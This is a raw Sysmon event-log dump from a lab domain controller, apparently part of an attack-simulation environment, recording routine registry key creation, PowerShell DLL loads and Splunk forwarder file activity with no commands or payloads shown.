12:18:43.092{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.091{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.936{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 12241200x800000000000000057346948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:43.090{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 11241100x800000000000000057346939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.038{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057346938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.038{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A066805B362AB83FE52D3BFEA86E702F,SHA256=D595C97286AB34F0AD01576C5DEB47632EA38F0710DE92D564E043D03D0B3972falsetrue 11241100x800000000000000057346937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.036{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057346936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:43.036{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0398F289AD582453741ECE4164080424,SHA256=4347018AB81F981A817A5BC601FBF4E0B88D2054ECC1478BCA114DE7D7B50556falsetrue 734700x800000000000000057348042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057348041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 734700x800000000000000057348040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 734700x800000000000000057348039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 734700x800000000000000057348038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 734700x800000000000000057348037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4530 (rs1_release.210705-0736)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=A579FD92E60D1CE05E20BF7569D579E8,SHA256=CD9DF3851153E3770E343CE224E6F969B9C5A466BF8C1036242DCBB5CE0F7986trueMicrosoft WindowsValid 13241300x800000000000000057348036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057348035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057348034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057348033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 13241300x800000000000000057348032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 734700x800000000000000057348031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 13241300x800000000000000057348030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings\MuiCache\171\52C64B7E\LanguageListBinary Data 12241200x800000000000000057348029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 734700x800000000000000057348027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\0fa7d4546f2b433a475b782745fe3354\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5880059EC43D513D3D2B58BB915ADE73,SHA256=338F7838E9D1CD563FD832A382B9CCB1591D59A7280FC7001D29D912909CBBBEfalse-Unavailable 734700x800000000000000057348026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.4467 (rs1_release.210604-1844)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=96BBBC9AD606CF5EBAF525E3AB1C69A5,SHA256=32F0EA9185A6E1DE26E3276BAAB0FB5ED72940D34FE5FFDF5331D91E42794124trueMicrosoft WindowsValid 11241100x800000000000000057348025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3z2vt43w.nqk.psm12021-11-12 12:18:44.975 11241100x800000000000000057348024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_jvrhhdcp.454.ps12021-11-12 12:18:44.975 12241200x800000000000000057348023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x800000000000000057348022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x800000000000000057348021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x800000000000000057348020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057348019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057348018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057348017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057348016Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057348015Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057348014Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057348013Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057348012Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057348011Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057348010Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057348009Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057348008Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057348007Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057348006Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057348005Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057348004Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057348003Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057348002Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057348001Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057348000Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs 12241200x800000000000000057347999Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs 12241200x800000000000000057347998Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates 12241200x800000000000000057347997Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057347996Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057347995Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347994Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347993Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347992Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 